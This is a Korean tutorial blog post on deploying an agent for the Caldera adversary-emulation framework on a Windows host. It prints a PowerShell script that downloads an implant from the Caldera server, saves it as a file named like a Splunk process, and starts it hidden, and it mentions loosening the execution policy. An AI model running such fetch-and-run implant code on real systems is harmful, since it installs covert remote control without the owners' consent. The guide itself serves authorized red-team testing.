칼데라 에이전트 실행하기
칼데라 에이전트를 설치하고 실행하는 절차를 소개합니다.
1. agent 설치 스크립트 내용 생성
페이지 좌측의 메뉴에서 agents 링크를 클릭하여 agents 페이지로 이동합니다.
다음 그림에서와 같이 나타나는 다이얼로그에서 Sandcat을 선택합니다.
그리고 다음 절차와 같이 실행합니다.
① platform으로 windows를 선택
② app.contact.http 항목에 칼데라 서버 주소를 입력
③ 생성된 스크립트의 내용 중 칼데라 서버 주소를 확인
제가 생성한 내용은 다음과 같습니다.
$server="http://192.168.42.138:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
get-process | ? {$_.modules.filename -like "C:\Users\Public\splunkd.exe"} | stop-process -f;
rm -force "C:\Users\Public\splunkd.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\splunkd.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\splunkd.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
2. 대상 호스트에서 agent 설치 스크립트 파일 생성
관리자 권한의 파워쉘 프롬프트를 실행하기 위해서 윈도우키+x 를 누른 후 "Windows PowerShell (Admin)" 항목을 선택하여 실행합니다.
다음 그림과 같이 agent 설치 대상 호스트에서 agent 설치 스크립트 파일을 생성합니다.
3. 대상 호스트에서 agent 설치 및 실행
관리자 권한의 파워쉘에서 생성한 agent 설치 스크립트를 실행합니다.
하지만 기본적인 설정으로는 아래 그림과 같이 스크립트 실행이 되지 않습니다.
스크립트를 실행하려면 아래와 같이 실행 규칙 변경이 필요합니다.
실행시간은 보통 10초 이내로 소요됩니다. 실행 후에는 다음과 같은 보안 경고를 볼 수 있습니다.
설치되어 실행 중인 프로세스를 확인하기 위해 Get-Process 명령을 사용할 수 있습니다.
실행의 예시는 다음 그림과 같습니다.
4. 칼데라에서 agent 연결 확인
agent 실행 후에 칼데라 페이지에서 다음과 같이 agent의 연결을 확인할 수 있습니다.
이상과 같이 칼데라 시스템을 이용하기 위해 대상 호스트에 agent를 설치하고 실행하는 절차를 소개했습니다.